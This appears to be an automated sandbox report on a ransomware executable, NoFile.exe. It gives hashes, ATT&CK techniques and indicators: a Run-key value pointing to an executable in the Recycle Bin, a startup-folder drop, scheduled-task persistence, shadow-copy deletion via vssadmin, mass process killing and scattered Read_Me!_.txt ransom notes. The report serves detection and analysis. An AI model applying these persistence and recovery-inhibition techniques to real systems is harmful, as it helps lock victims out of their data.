87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae

General

Target

NoFile.exe
Size

2.2MB
MD5

7d1ed67b77f47ba8aadf9a3ac7d0c371
SHA1

a598e6708c189caeef1fa76064feb4d0155abb3d
SHA256

87300e6563c7ac9d8d758b219d135fb8b84a7788419a0ddd8c3470cc1e739eae
SHA512

17e468ba87f06c599b40b2dc8256bacfcfeb53cde8ac48b77d61f2c5a074b9cbe19e27e71029c67960d18af886813fc2c1b2b5afd89ae25147b179c233f120f9

Score

10^/10

evasion persistence ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

Drops startup file 2 IoCs

Processes:

NoFile.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	NoFile.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe	NoFile.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3846991908-3261386348-1409841751-1000\Software\Microsoft\Windows\CurrentVersion\Run\Machin_Update = "c:\\$Recycle.Bin\\RCRU_64.exe"	reg.exe

Drops desktop.ini file(s) 2 IoCs

Processes:

NoFile.exe

description	ioc	process
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	NoFile.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

NoFile.exe

description	ioc	process
File opened (read-only)	\??\e:	NoFile.exe
File opened (read-only)	\??\h:	NoFile.exe
File opened (read-only)	\??\n:	NoFile.exe
File opened (read-only)	\??\q:	NoFile.exe
File opened (read-only)	\??\s:	NoFile.exe
File opened (read-only)	\??\J:	NoFile.exe
File opened (read-only)	\??\V:	NoFile.exe
File opened (read-only)	\??\X:	NoFile.exe
File opened (read-only)	\??\U:	NoFile.exe
File opened (read-only)	\??\v:	NoFile.exe
File opened (read-only)	\??\E:	NoFile.exe
File opened (read-only)	\??\Z:	NoFile.exe
File opened (read-only)	\??\y:	NoFile.exe
File opened (read-only)	\??\R:	NoFile.exe
File opened (read-only)	\??\T:	NoFile.exe
File opened (read-only)	\??\a:	NoFile.exe
File opened (read-only)	\??\p:	NoFile.exe
File opened (read-only)	\??\t:	NoFile.exe
File opened (read-only)	\??\F:	NoFile.exe
File opened (read-only)	\??\L:	NoFile.exe
File opened (read-only)	\??\O:	NoFile.exe
File opened (read-only)	\??\x:	NoFile.exe
File opened (read-only)	\??\i:	NoFile.exe
File opened (read-only)	\??\r:	NoFile.exe
File opened (read-only)	\??\H:	NoFile.exe
File opened (read-only)	\??\b:	NoFile.exe
File opened (read-only)	\??\f:	NoFile.exe
File opened (read-only)	\??\S:	NoFile.exe
File opened (read-only)	\??\Y:	NoFile.exe
File opened (read-only)	\??\g:	NoFile.exe
File opened (read-only)	\??\j:	NoFile.exe
File opened (read-only)	\??\l:	NoFile.exe
File opened (read-only)	\??\A:	NoFile.exe
File opened (read-only)	\??\K:	NoFile.exe
File opened (read-only)	\??\M:	NoFile.exe
File opened (read-only)	\??\W:	NoFile.exe
File opened (read-only)	\??\k:	NoFile.exe
File opened (read-only)	\??\m:	NoFile.exe
File opened (read-only)	\??\o:	NoFile.exe
File opened (read-only)	\??\B:	NoFile.exe
File opened (read-only)	\??\G:	NoFile.exe
File opened (read-only)	\??\Q:	NoFile.exe
File opened (read-only)	\??\u:	NoFile.exe
File opened (read-only)	\??\w:	NoFile.exe
File opened (read-only)	\??\z:	NoFile.exe
File opened (read-only)	\??\I:	NoFile.exe
File opened (read-only)	\??\N:	NoFile.exe
File opened (read-only)	\??\P:	NoFile.exe

Drops file in Program Files directory 64 IoCs

Processes:

NoFile.exe

description	ioc	process
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\System\msadc\msdaremr.dll	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Portal\PortalConnectCore.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\lua\http\dialogs\mosaic_window.html	NoFile.exe
File created	\??\c:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\es-ES\js\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Microsoft Games\Hearts\de-DE\Hearts.exe.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_SelectionSubpicture.png	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\MANIFEST.MF	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkTSFrame.png	NoFile.exe
File opened for modification	\??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\Microsoft.Build.Utilities.v3.5.resources.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-javahelp.xml	NoFile.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\lua\http\requests\playlist.xml	NoFile.exe
File created	\??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\BOLDSTRI\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Stationery\Roses.htm	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\System\ado\fr-FR\msader15.dll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\plugins\access\libvcd_plugin.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-progress.xml	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jre7\lib\zi\SystemV\AST4	NoFile.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\Smart Tag\LISTS\1033\PHONE.XML	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\SPRING.ELM	NoFile.exe
File created	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.nl_zh_4.4.0.v20140623020002.jar	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-swing-plaf.xml	NoFile.exe
File opened for modification	\??\c:\Program Files\Windows Media Player\es-ES\WMPMediaSharing.dll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_corner_top_left.png	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\jp2native.dll	NoFile.exe
File created	\??\c:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\css\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\pkeyconfig.companion.dll	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Word.en-us\SETUP.XML	NoFile.exe
File created	\??\c:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SPRING\Read_Me!_.txt	NoFile.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\ink\nl-NL\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\bin\servertool.exe	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunjce_provider.jar	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna	NoFile.exe
File opened for modification	\??\c:\Program Files\Windows Photo Viewer\ImagingDevices.exe	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT	NoFile.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationUp_ButtonGraphic.png	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif	NoFile.exe
File opened for modification	\??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\ReachFramework.resources.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.AddIn.Contract.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB	NoFile.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationLeft_ButtonGraphic.png	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jre7\lib\zi\Asia\Makassar	NoFile.exe
File opened for modification	\??\c:\Program Files\VideoLAN\VLC\plugins\d3d11\libdirect3d11_filters_plugin.dll	NoFile.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\21.png	NoFile.exe
File opened for modification	\??\c:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-waning-crescent_partly-cloudy.png	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Updater.api	NoFile.exe
File opened for modification	\??\c:\Program Files\Common Files\Microsoft Shared\ink\it-IT\tipresx.dll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar	NoFile.exe
File opened for modification	\??\c:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\TipTsf.dll.mui	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-settings.jar	NoFile.exe
File created	\??\c:\Program Files\Common Files\Microsoft Shared\OFFICE14\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\Pets\rollinghills.png	NoFile.exe
File created	\??\c:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_fr.jar	NoFile.exe
File created	\??\c:\Program Files\Java\jdk1.7.0_80\jre\lib\applet\Read_Me!_.txt	NoFile.exe
File opened for modification	\??\c:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\feature.xml	NoFile.exe

Drops file in Windows directory 2 IoCs

Processes:

NoFile.exe

description ioc process

File created C:\Windows\Pagesfilo.sys NoFile.exe
File opened for modification C:\Windows\Pagesfilo.sys NoFile.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

560 schtasks.exe

description	ioc	process
File created	C:\Windows\Pagesfilo.sys	NoFile.exe
File opened for modification	C:\Windows\Pagesfilo.sys	NoFile.exe

pid	process
560	schtasks.exe

Delays execution with timeout.exe 10 IoCs

evasion

Processes:

timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exe

pid	process
968	timeout.exe
672	timeout.exe
552	timeout.exe
1708	timeout.exe
688	timeout.exe
1588	timeout.exe
1740	timeout.exe
560	timeout.exe
1780	timeout.exe
1656	timeout.exe

Enumerates processes with tasklist 1 TTPs 11 IoCs

Process Discovery

T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid	process
1928	tasklist.exe
1872	tasklist.exe
796	tasklist.exe
1820	tasklist.exe
1696	tasklist.exe
968	tasklist.exe
1396	tasklist.exe
972	tasklist.exe
632	tasklist.exe
1060	tasklist.exe
364	tasklist.exe

Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exesysteminfo.exe

pid process

964 systeminfo.exe
1160 systeminfo.exe
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

1260 vssadmin.exe
772 vssadmin.exe

pid	process
964	systeminfo.exe
1160	systeminfo.exe

pid	process
1260	vssadmin.exe
772	vssadmin.exe

Kills process with taskkill 40 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1520	taskkill.exe
1780	taskkill.exe
1552	taskkill.exe
1984	taskkill.exe
1664	taskkill.exe
1364	taskkill.exe
2020	taskkill.exe
292	taskkill.exe
1548	taskkill.exe
920	taskkill.exe
932	taskkill.exe
268	taskkill.exe
1924	taskkill.exe
688	taskkill.exe
1260	taskkill.exe
1272	taskkill.exe
1044	taskkill.exe
1776	taskkill.exe
1732	taskkill.exe
1272	taskkill.exe
1060	taskkill.exe
624	taskkill.exe
864	taskkill.exe
1612	taskkill.exe
1524	taskkill.exe
316	taskkill.exe
820	taskkill.exe
964	taskkill.exe
1244	taskkill.exe
1728	taskkill.exe
460	taskkill.exe
2028	taskkill.exe
580	taskkill.exe
1696	taskkill.exe
1740	taskkill.exe
364	taskkill.exe
1300	taskkill.exe
1708	taskkill.exe
1396	taskkill.exe
560	taskkill.exe

Modifies registry key 1 TTPs 3 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exe

pid process

856 reg.exe
672 reg.exe
1732 reg.exe

pid	process
856	reg.exe
672	reg.exe
1732	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

tasklist.exetasklist.exetaskmgr.exe

pid	process
796	tasklist.exe
796	tasklist.exe
632	tasklist.exe
632	tasklist.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

796 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

tasklist.exetasklist.exevssvc.exetaskmgr.exetasklist.exeWMIC.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetasklist.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

description	pid	process
Token: SeDebugPrivilege	796	tasklist.exe
Token: SeDebugPrivilege	632	tasklist.exe
Token: SeBackupPrivilege	2008	vssvc.exe
Token: SeRestorePrivilege	2008	vssvc.exe
Token: SeAuditPrivilege	2008	vssvc.exe
Token: SeDebugPrivilege	796	taskmgr.exe
Token: SeDebugPrivilege	1820	tasklist.exe
Token: SeIncreaseQuotaPrivilege	460	WMIC.exe
Token: SeSecurityPrivilege	460	WMIC.exe
Token: SeTakeOwnershipPrivilege	460	WMIC.exe
Token: SeLoadDriverPrivilege	460	WMIC.exe
Token: SeSystemProfilePrivilege	460	WMIC.exe
Token: SeSystemtimePrivilege	460	WMIC.exe
Token: SeProfSingleProcessPrivilege	460	WMIC.exe
Token: SeIncBasePriorityPrivilege	460	WMIC.exe
Token: SeCreatePagefilePrivilege	460	WMIC.exe
Token: SeBackupPrivilege	460	WMIC.exe
Token: SeRestorePrivilege	460	WMIC.exe
Token: SeShutdownPrivilege	460	WMIC.exe
Token: SeDebugPrivilege	460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	460	WMIC.exe
Token: SeRemoteShutdownPrivilege	460	WMIC.exe
Token: SeUndockPrivilege	460	WMIC.exe
Token: SeManageVolumePrivilege	460	WMIC.exe
Token: 33	460	WMIC.exe
Token: 34	460	WMIC.exe
Token: 35	460	WMIC.exe
Token: SeIncreaseQuotaPrivilege	460	WMIC.exe
Token: SeSecurityPrivilege	460	WMIC.exe
Token: SeTakeOwnershipPrivilege	460	WMIC.exe
Token: SeLoadDriverPrivilege	460	WMIC.exe
Token: SeSystemProfilePrivilege	460	WMIC.exe
Token: SeSystemtimePrivilege	460	WMIC.exe
Token: SeProfSingleProcessPrivilege	460	WMIC.exe
Token: SeIncBasePriorityPrivilege	460	WMIC.exe
Token: SeCreatePagefilePrivilege	460	WMIC.exe
Token: SeBackupPrivilege	460	WMIC.exe
Token: SeRestorePrivilege	460	WMIC.exe
Token: SeShutdownPrivilege	460	WMIC.exe
Token: SeDebugPrivilege	460	WMIC.exe
Token: SeSystemEnvironmentPrivilege	460	WMIC.exe
Token: SeRemoteShutdownPrivilege	460	WMIC.exe
Token: SeUndockPrivilege	460	WMIC.exe
Token: SeManageVolumePrivilege	460	WMIC.exe
Token: 33	460	WMIC.exe
Token: 34	460	WMIC.exe
Token: 35	460	WMIC.exe
Token: SeDebugPrivilege	1696	taskkill.exe
Token: SeDebugPrivilege	1708	taskkill.exe
Token: SeDebugPrivilege	1740	taskkill.exe
Token: SeDebugPrivilege	316	taskkill.exe
Token: SeDebugPrivilege	820	taskkill.exe
Token: SeDebugPrivilege	364	taskkill.exe
Token: SeDebugPrivilege	1396	taskkill.exe
Token: SeDebugPrivilege	1364	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	1244	taskkill.exe
Token: SeDebugPrivilege	1552	taskkill.exe
Token: SeDebugPrivilege	920	taskkill.exe
Token: SeDebugPrivilege	1696	tasklist.exe
Token: SeDebugPrivilege	932	taskkill.exe
Token: SeDebugPrivilege	1272	taskkill.exe
Token: SeDebugPrivilege	560	taskkill.exe
Token: SeDebugPrivilege	1984	taskkill.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

taskmgr.exe

pid	process
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe
796	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

NoFile.execmd.execmd.execmd.exeWScript.execmd.execmd.exe

description	pid	process	target process
PID 1604 wrote to memory of 808	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 808	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 808	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 808	1604	NoFile.exe	cmd.exe
PID 808 wrote to memory of 796	808	cmd.exe	tasklist.exe
PID 808 wrote to memory of 796	808	cmd.exe	tasklist.exe
PID 808 wrote to memory of 796	808	cmd.exe	tasklist.exe
PID 808 wrote to memory of 796	808	cmd.exe	tasklist.exe
PID 808 wrote to memory of 1032	808	cmd.exe	findstr.exe
PID 808 wrote to memory of 1032	808	cmd.exe	findstr.exe
PID 808 wrote to memory of 1032	808	cmd.exe	findstr.exe
PID 808 wrote to memory of 1032	808	cmd.exe	findstr.exe
PID 1604 wrote to memory of 1796	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1796	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1796	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1796	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1820	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1820	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1820	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1820	1604	NoFile.exe	cmd.exe
PID 1820 wrote to memory of 580	1820	cmd.exe	WScript.exe
PID 1820 wrote to memory of 580	1820	cmd.exe	WScript.exe
PID 1820 wrote to memory of 580	1820	cmd.exe	WScript.exe
PID 1820 wrote to memory of 580	1820	cmd.exe	WScript.exe
PID 1604 wrote to memory of 268	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 268	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 268	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 268	1604	NoFile.exe	cmd.exe
PID 268 wrote to memory of 560	268	cmd.exe	schtasks.exe
PID 268 wrote to memory of 560	268	cmd.exe	schtasks.exe
PID 268 wrote to memory of 560	268	cmd.exe	schtasks.exe
PID 268 wrote to memory of 560	268	cmd.exe	schtasks.exe
PID 580 wrote to memory of 1624	580	WScript.exe	cmd.exe
PID 580 wrote to memory of 1624	580	WScript.exe	cmd.exe
PID 580 wrote to memory of 1624	580	WScript.exe	cmd.exe
PID 580 wrote to memory of 1624	580	WScript.exe	cmd.exe
PID 580 wrote to memory of 832	580	WScript.exe	cmd.exe
PID 580 wrote to memory of 832	580	WScript.exe	cmd.exe
PID 580 wrote to memory of 832	580	WScript.exe	cmd.exe
PID 580 wrote to memory of 832	580	WScript.exe	cmd.exe
PID 832 wrote to memory of 632	832	cmd.exe	tasklist.exe
PID 832 wrote to memory of 632	832	cmd.exe	tasklist.exe
PID 832 wrote to memory of 632	832	cmd.exe	tasklist.exe
PID 832 wrote to memory of 632	832	cmd.exe	tasklist.exe
PID 832 wrote to memory of 1176	832	cmd.exe	find.exe
PID 832 wrote to memory of 1176	832	cmd.exe	find.exe
PID 832 wrote to memory of 1176	832	cmd.exe	find.exe
PID 832 wrote to memory of 1176	832	cmd.exe	find.exe
PID 1604 wrote to memory of 1876	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1876	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1876	1604	NoFile.exe	cmd.exe
PID 1604 wrote to memory of 1876	1604	NoFile.exe	cmd.exe
PID 1876 wrote to memory of 1512	1876	cmd.exe	nslookup.exe
PID 1876 wrote to memory of 1512	1876	cmd.exe	nslookup.exe
PID 1876 wrote to memory of 1512	1876	cmd.exe	nslookup.exe
PID 1876 wrote to memory of 1512	1876	cmd.exe	nslookup.exe
PID 832 wrote to memory of 1260	832	cmd.exe	vssadmin.exe
PID 832 wrote to memory of 1260	832	cmd.exe	vssadmin.exe
PID 832 wrote to memory of 1260	832	cmd.exe	vssadmin.exe
PID 832 wrote to memory of 1260	832	cmd.exe	vssadmin.exe
PID 832 wrote to memory of 672	832	cmd.exe	timeout.exe
PID 832 wrote to memory of 672	832	cmd.exe	timeout.exe
PID 832 wrote to memory of 672	832	cmd.exe	timeout.exe
PID 832 wrote to memory of 672	832	cmd.exe	timeout.exe

C:\Users\Admin\AppData\Local\Temp\NoFile.exe
"C:\Users\Admin\AppData\Local\Temp\NoFile.exe"
1⤵
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1604

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
2⤵
